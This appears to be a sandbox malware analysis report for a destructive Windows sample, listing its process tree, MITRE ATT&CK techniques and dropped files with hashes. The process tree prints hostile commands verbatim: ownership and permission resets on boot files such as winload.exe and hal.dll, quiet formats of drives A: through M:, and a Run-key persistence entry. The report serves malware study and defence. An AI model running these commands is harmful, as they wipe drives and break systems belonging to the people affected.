    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:6992
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:7016
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:8272
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:12396
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:2776
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:9352
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6720
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:9280
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:10768
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:11268
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:8068
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4480
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4496
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4504
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4512
- - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4520
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\992.tmp\993.tmp\994.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
      4⤵
      PID:5448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:5176
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        
        PID:2380
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:5168
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:6200
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6288
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6500
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:6628
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6660
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6736
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:6864
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6912
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:7040
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:7064
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:8516
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:12724
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:12712
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:12124
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2776
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4536
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4552
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4560
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:4568
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    - Enumerates connected drives
    PID:4636
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    - Enumerates connected drives
    PID:4756
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:4804
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:4872
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:4228
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:4596
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:4844
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:5060
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:4916
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:4696
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:4464
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:1948
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\bdaplgin.ax"
    3⤵
    PID:5008
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\bdaplgin.ax" /reset /c /q
    3⤵
    PID:5176
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\bdaplgin.ax"
    3⤵
    PID:5224
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\g711codc.ax"
    3⤵
    PID:5472
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\g711codc.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:5916
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\g711codc.ax"
    3⤵
    PID:6016
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\ksproxy.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:5220
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\ksproxy.ax" /reset /c /q
    3⤵
    PID:5780
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\ksproxy.ax"
    3⤵
    PID:5932
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\kstvtune.ax"
    3⤵
    PID:6232
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\kstvtune.ax" /reset /c /q
    3⤵
    PID:6464
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\kstvtune.ax"
    3⤵
    - Views/modifies file attributes
    PID:6512
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\Kswdmcap.ax"
    3⤵
    - Modifies file permissions
    PID:6636
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\Kswdmcap.ax" /reset /c /q
    3⤵
    PID:6856
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\Kswdmcap.ax"
    3⤵
    - Views/modifies file attributes
    PID:6904
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\ksxbar.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:7032
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\ksxbar.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:7148
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\ksxbar.ax"
    3⤵
    - Views/modifies file attributes
    PID:5168
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\Mpeg2Data.ax"
    3⤵
    PID:5872
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\Mpeg2Data.ax" /reset /c /q
    3⤵
    PID:6924
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\Mpeg2Data.ax"
    3⤵
    PID:6272
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\mpg2splt.ax"
    3⤵
    - Modifies file permissions
    PID:7672
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\mpg2splt.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:8132
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\mpg2splt.ax"
    3⤵
    PID:1256
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\MSDvbNP.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:8664
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\MSDvbNP.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:3336
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\MSDvbNP.ax"
    3⤵
    PID:9384
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\MSNP.ax"
    3⤵
    - Modifies file permissions
    PID:10680
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\MSNP.ax" /reset /c /q
    3⤵
    PID:8868
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\MSNP.ax"
    3⤵
    PID:11444
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\psisrndr.ax"
    3⤵
    PID:11992
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\psisrndr.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:12536
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\psisrndr.ax"
    3⤵
    PID:12832
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\VBICodec.ax"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:12124
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\VBICodec.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:13072
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\VBICodec.ax"
    3⤵
    - Views/modifies file attributes
    PID:12540
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vbisurf.ax"
    3⤵
    - Modifies file permissions
    PID:6400
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vbisurf.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2704
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vbisurf.ax"
    3⤵
    - Views/modifies file attributes
    PID:2408

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-792723963-1832888550578714991429164000-1658075187-6156245611601770895-20904"
1⤵
PID:2328

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-487004584-169628528716768575659856960-119805356-114944764615613274071425943223"
1⤵
PID:1704

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-395684382-87464399-271994255-953788665112895096246480408-1760298659-1314375016"
1⤵
PID:4684

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2253554051833530249-731602307131321135-475891949-1913448101-1667206298-2119950081"
1⤵
PID:3804

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1539993732-18393681-11122691971866808233-148648422786829391921811311-1492892727"
1⤵
PID:3164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe

Filesize
112KB

MD5
81a7a946456f1f6dae4715b1feb72ed0

SHA1
af83b938017efd53f95671adc0c6d2aa1088d38e

SHA256
690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

SHA512
a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
63B

MD5
4cb4efde0d2476b32d5a347a52df6c1b

SHA1
d2b3d042dfc64cc15b41b83b6f0252497a515e95

SHA256
1db6458800616839e864831147cc6d91845825e365925151f649b5d998152273

SHA512
1a676aec628275f5812bc99f7055713986579304df42328559b7a0adeb99601a2a680144a0f3b1685a0126c034cbf9f75ac89cb5cd1c8ca87f7e68824771ebce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\BBE0.tmp\BBE1.tmp\BBE2.bat

Filesize
23KB

MD5
afb3843724a58bbbb53fd12a8f42d8e6

SHA1
0835bbceeb20027752c05e48b1b7c4571611f32f

SHA256
53f749148a1e78cf315f16934350a13113705b95d2a375573c7007dfeaba047d

SHA512
8c8ba2b13e6fc63ddb7205ef223a2cf954fdcc8737ee031533d916535df401581dad3c3bd53416340e12569d9ad505051a63edc4f77905dbd96f94eadef84fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
57B

MD5
5420b2137427b07b4d6a585ae3b69e08

SHA1
feb511d0b40064ab8a491caf699f5959bc9d4716

SHA256
ae3ab245b4001b487205480988a1aa775de104faf0e5d9c43dd3d1cf285196a1

SHA512
2d5e64f315b8d72e7ff178042cb131baf0d982e74c09455911358ab3552e6e5919ac5f567b1cf31f91ad5613f2b91c5eff5e251e014c230490e4a323da7a7946

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
30B

MD5
c1d1d009fa868b67fe8ae820ae3a7564

SHA1
5908963134b1dc6b00cd335f42e7721f668f832a

SHA256
721dad6e2ab061b3d306bf39656fc32e82b007b43a7ea5367b69b2a62e51af49

SHA512
671f69f2f037920c78269ad9322f517b10e169d62d8b16aff899e55c66a0560cc5df389e5b2ee1139bef4cfe86263ceadbb705fc7f8a4296430a2a5b46d1eaab

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
90B

MD5
acba0fe3a48e7297440c136aaf975e44

SHA1
3eafa0722acbafa8cb61eaf1a93d51563c5ec987

SHA256
549bc4d8027b5b82b9b73e89f7c1549d4690c9bea4c13dfaa210a737718b73da

SHA512
cc216231aa16c41b963e1b732f2a5e49ced2efd409137e5c6fd54f4fb52092e951825aba4b5a0b9486c0695336e7b451c849a1422a8741c94ac9aaa1e2cdc4dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
120B

MD5
9512cf977fd3cfacad693e88bc62cc7e

SHA1
006b8a3d5c348e3c2963da33e5b8483c2d9badd1

SHA256
b7f4d2db7506132f6b164931675e8bdc63abdecdc035385ede0e667b5b60945e

SHA512
83ebe1086aa48f9a8a3222f43e5bf3021c1841852d0876f76557b22397d9ece8370fd5cef6717dae2031196246eafe0eb622af65ee1bf1ca7adb4974f5750896

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
71B

MD5
c50b8418d9f7ec5980f0bcd9bca4a735

SHA1
d00d3064b043e6cb78476d7820998d9b89f9fdc7

SHA256
48ee941955387e29c12380d852a363bdf22ef49897c0bd814aaeacba6bc852aa

SHA512
0b71f8c7bb3d9be0017dd30cb25500df4a04d77234c9ed36222fda37af1a2b66dc8fccd2fe8c27f164bef7b892e9a6b1745469623cb71f3c3a1700509165f6f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
14KB

MD5
1bad8558f3516ac2a33bda18398ae7bd

SHA1
ca6e3cdc52e209f639a4e260dd21602baeb4f009

SHA256
f00f4cfb8ff634c4eba20ba674b1906f82c35f7dfc933009ae30203749cef8ee

SHA512
e3b245dfe1b550e2a7ee96952f67039d45dd0d4db1e09ecb4e66516d68a8e4b69e7b607481fa49d0b92557007eee4dbe46276325c3304775202f3db16617a3ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
5KB

MD5
2c9c6ab6e19733c7fdef9a0b403ba56a

SHA1
68e53822209aa00676f6cb59b795fbb0d3327271

SHA256
5dcbfc4c03b1ce09af8f837e50cd901db71a398b1846029fbb3811711988f119

SHA512
acf8fc2e1e87440589215514b93fa20bdf07060ab1cff0451a1a51b8c1684fbc74514e592ad7beb05ec0d4741cc48fdf8433e2581c22517c9994f2131205ddfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
5KB

MD5
f386aaaf0fc24a9ae75a9ae719e1af47

SHA1
0f2ad203e584de0b259e7b09d1640f84d15b0cc9

SHA256
23fef36548a2e9ef758e1a7808ab064855c7accd9c6cd1560409e347a070e4b7

SHA512
c8a2206d5d5ceeac8feec40d993c1698107e42e41d71b53eb0f20133b77711007dc6bf49bbe5d1f0e5adc7f28bb941946a65994b7225576196b0c698a5fbcc2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
5KB

MD5
d9e4e132ff2ef98d3079d375f4b4cd50

SHA1
59fb6408b07dd520528126555e674947083c48ac

SHA256
e4e89ec2432f218ba6c14d273868f28e9ad9fda4d624dfdb4512f9201e7b95e4

SHA512
e189eece36014040cf783fd18dcc72bec4c2160b1ae70e6805143c96961428bc977f49ac3787dcefe3c493527b8dd1af67187d8524175f36ea464ce996f323dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
493B

MD5
4aab11cd120a4403bb34ece36cfdac9a

SHA1
d7de6d3f126867569648eae640c514e6c96469c4

SHA256
c13197ea41f916fa8b6ea00f9c8fcbcd007925bd9e2ddc9db1d30310ca67cbbf

SHA512
c8ca17e977510a789998003e0cd42d36e8f4cc6e491a7d2662ec49c9e69b996e1b644c730a51b348be498d86c32635743b9924aaedfde082d18fc368a0d44028

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
188B

MD5
a5fa08e54b3818a7ee1d88ea2662d0ee

SHA1
bca38f9f1f103beb93b6ba7451b848edba0be8ee

SHA256
ca105f2e9b178394fe18c299ccb1234d42caa587f090f73ee12bee04fdb04f7b

SHA512
80583a90d237c08514d9113ed1115a0d6e36ca7f754b1a9aaf5b560f78a7885831b5258d0f25705e2701cb15d64d7f99beb7f731ec7d61d4b648fe0ffbb1f782

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
564B

MD5
de03d0b3b85643b033710b2831264c4e

SHA1
0fc279909ddf2b27360db5de557d9bfbd21f2943

SHA256
f07b1deca175e337ff0491321ba66d6d33b6a5d46ca098392f103155eab3b41a

SHA512
02a07a1df53a6e610684a26991e1e96ff38acd3434159ad5de68d2307165588c7f9b40eca9300f634823e9c7dc6dd4f4b13a759b4a320fa3b72917a7637a8c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
752B

MD5
735e8e1b5a3a291f0a6376b475a14d5e

SHA1
daa694fc72b0c012bc3e9ba5af76de82288f3559

SHA256
eb4cba4d58b2e0aa03d9cbf966f48406b87e5e37392f84447d85f605028e3d5a

SHA512
f9792b52afb2bbc19e1aad167e1929008275a97cf6644ef655069a79f0ae172a0380ac0be319079b906f8ca5a39d0914ab836473dcba68ac312b3845476f5a96

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
940B

MD5
9765aca48bd63b4bf1d476d982bcee83

SHA1
08c1fa6bba25914aacf9d3ef2dbcb101e3c5ec78

SHA256
35df7e8e88dbff758942c3761ff852643dad8d48f19a864ff0c5c71a15cfbdbd

SHA512
1495ca3b6c2f38ebef21d30e2fcb64cc62ef52d580aefda1c70cf18ed4fa6e7cf05301697dac3ff5aa6c719225edc150d41e4c09b2b93d97b24e76da1dab4a25

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
1KB

MD5
acd17abdf97e24b563e3b6b2df47eff9

SHA1
011aea1a5871d39cbabbf5b2381c3476a4e8b851

SHA256
36f02e88e3aebcad28533c662b3d9aa0b6d33ccaf5374aab947d32d2d4d62d53

SHA512
7f4db61ca2dfdce710101d33b8341d697e95ab9f50b43323272eaa6c11639d6df4a4b9f1d7c767e15a9592fabf4a24ecac4a12346eb211946e46213d58101443

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
3KB

MD5
d2418e361c168e9eac8a51be40edb99e

SHA1
51705f16061e3d46f04aa3a2c0a5ebe37a6d866d

SHA256
ce1ab650cb09effe6b7a0bdcbe3cad6237c6005d396fc660667ebbaaae7ee7a1

SHA512
118b4272b600bfed1256e17dc45207d3f0f9937da7d46b636001bc4b1c3cd86786a7637c9423052b0e1ef2308a9104e64375febd899e858264e55cb762a0d93e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
4KB

MD5
28433f1d3ec31e6cdf6e65d86d4fd7ea

SHA1
0d7a53f29ef2bcb5281e0dfed1f7d2c8e0b037ab

SHA256
8d85b452c0bfc884593ae832fc8effc8af47a54e1561d94bc0fd79ce99133e5e

SHA512
e0c72c116407bb29e9fdab6f5ba1db79c47df3610afcfece6b8e5e01d3587928450c902355c89627dddef297d78b971aea321bfaf98b75a04fb9b84155a3ffb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
4KB

MD5
08d9edf356f4c108fce089f4a035448b

SHA1
77d97d826363e7ab409cad7668a958dbe48395da

SHA256
e139c738253d3645acd246fa9793559c70bdcc7006ce69fe580b6f8fa6435b21

SHA512
4528b63e43a48075e598e72d30c97fed39d82f3a7ba780ff74ea10acfb53d290272f1b2d9c8bb119db076bcaa7ad9fdeb9a3e5cda4b162ce1cab2cd130bf79f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
7KB

MD5
4a3d0f0b7f766ae3d67ea5517ce7acac

SHA1
e8eed23034a46fb2c888b93b9a3989d3a2a02092

SHA256
a597a94cdfec2db6a3a38ac75f400d39cecea7323f6087776c747b7834109831

SHA512
2816452107aa52cea633a0151f7e7f254f74165a9eec0f7060a813d25bb0b0207ee52f49704af99718d286b85f1237ae104e3609bd09b7b7a6122b8c5ad24290

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
14KB

MD5
36debc5b7cc2018697683d7110af9a77

SHA1
bb49ac6f34074b2bd211c0b2b5cf8bbb5c7320c8

SHA256
fd2c5e3ee876aa1823e83d2cc1ce08f93df7f220ffa1005a889ba990277a7886

SHA512
5b815b4dd4c2259883a4386b50dc5a7e146891fe670a3db367a4828d9d45404c370c0ce94c396499eb1f9597a4f2185863391be4616bb5a07fd69299375c7c32

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
15KB

MD5
8c700d234e57ed99fb7a14dd2c4b3f3d

SHA1
76bb9bf4df6bc74c85f565d6d9abbf3430ec73ce

SHA256
12c958a71fcb5e1620c3d64039b966e7d6209d52c70ad91f57237823e2ac55c1

SHA512
5bea80ecc2939a0ba179a7514393d3471ffcd24a04b84ad042c970dc118371a673553e355160ce888e7f46d1adc109e6d355ecadfe53aa893f03689c2e2ec14a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
18KB

MD5
a690dd9c2bc368c478271d509ab9db41

SHA1
8c4b4632910e81a4475b757d19ce01b57b200a2d

SHA256
cd2a452c08058fde514be9632f841788a7e97d5d7a04bb3c67e82b5a7f22f9d3

SHA512
96b71d771d408bb0d399f75f22666ac74398160c7fe85d0301d15a90c77f1355c97840ab062ca60c97b272cbbb76681a52f1d9460c54fa0eb775e1cd2db7cbab

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
24KB

MD5
4e608f5f1893b61ba0587eef91336f05

SHA1
f9edaaaced740ba586ab95224d184821d9c460d3

SHA256
7da8b5627c5483dcef40c5c075f0e44e0f500bc23dc4d3b9c031fd5500c68ce8

SHA512
ce114b99e4690b5a0664841874e0db47f3aea1aff128f627dc196d5cd888c0d20b7fd62544c179e3f45c6c2ff002d147d99bcc73d2be648265015d5c0d6b887f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
28KB

MD5
430df3dd3689d5c1cf9c8dd6763b4aa3

SHA1
448bb42ee325d188f55ba1a4c3a4179b65faa4f1

SHA256
346230c1b48aba49aedf294db761c50a2b4cb1cc6ad37659075678d1684c2ef1

SHA512
5d1797609f681ddadf1a209cbe350f7f195d4607091106097c0678df6d51519ba313aab326a275f34e3d498d75b91e31ea983052489dc8f7595c6f84d75e8bdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe

Filesize
10KB

MD5
0ae0ce4c291c2cf6e1f241a95faa98a1

SHA1
0071093e577bba14f37e17c700885ed72393cb84

SHA256
ffbf5a2f5052dd7cf652c12df320609d147f18b2560e5a0787fc2eed08a4d1f8

SHA512
a6c8f647aeac1f13c857318c79c506dc87f24a2f47de5f7fedec5b4f247688a4a7e378ba6ce73f8d13687051d951182fba9275c35e17766f847a09544d25e928

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.bin

Filesize
15B

MD5
2e040a2c3dc0a6244336ea1ef7331036

SHA1
e5d28f22dfdf708f50b2a1be528b0940a681f5d6

SHA256
cdc4963ef8d7e1148d72592768d0c9713d731fc70d2e707045c51204d8eb7eac

SHA512
6b7d4e3bf85ae07de833a4f65ff7a795bb844d48d1518bc240231d6e84cc7b907d00fdd40ba05fa88ee92aa728ec21ef826ea9398ca972277a7e6471df0f29ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.chk

Filesize
17B

MD5
48afa8f25eb86891c337efef1b97e903

SHA1
75e35640635c3a5974f0d69d850c03452a43861c

SHA256
e930a7ffb180387973fe0db21b1131ead14965888192e7c97742636c51598d10

SHA512
657de42a13cb2e1ef7505f684918616346bb3a9025826292dbf3559ce1d8ffa162138c2934e4006e480821540e1387bf895899a5b0df25b5fe3ca710da2a445e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.cmd

Filesize
16B

MD5
630008ccbd2c55299087d1b98c1b74ad

SHA1
372d41841aedde004f64e0ad2d81f42d9ca61bb4

SHA256
9b3fb8166cc8730f64d49eda68fc55a2ecdfb634182db10b1f689ba169d357ae

SHA512
b4688887432cfd268bc2fb0576e85a7809f66ea04f11b27c4e93ef2e72bda02fdc51ae935abbc6de3c27255dc275a4c2029c86e1bbc2e0273e823cbc92493c0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.com

Filesize
17B

MD5
e3786e4d995ef05904f4f66c6ceab9c6

SHA1
f90672c4bf20a23077fde96d028ec152d6e062ef

SHA256
bef99255b60fa9a89e0ff57423c66a6d89106864a1a3789c22f671beb05bbc9b

SHA512
d56bfbd96a9b21d5c11a253130d5d3ff5801d165c602e5aa29d2cc08c060f7991fd97ddcb2da0814f19142145402e749116800e8b4492ab306253ff306edd526

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.dat

Filesize
16B

MD5
9407c9c1b6d2c579ca127933ed988802

SHA1
ee29ff2e6e608a36dc8052477438d80020622936

SHA256
bba913ab771a5139f4179a9787001f577f1963fa066238ff01cc5ede2c9d955e

SHA512
ae4ad8ebd20878989b49feaa3dff6d072181fd1ddd7d8d45ef327ade9faf0edec37a829fedc0dfea025105c07a27f6216c241baa74d27b49c4dd60fc25fdfab5

Download Submit
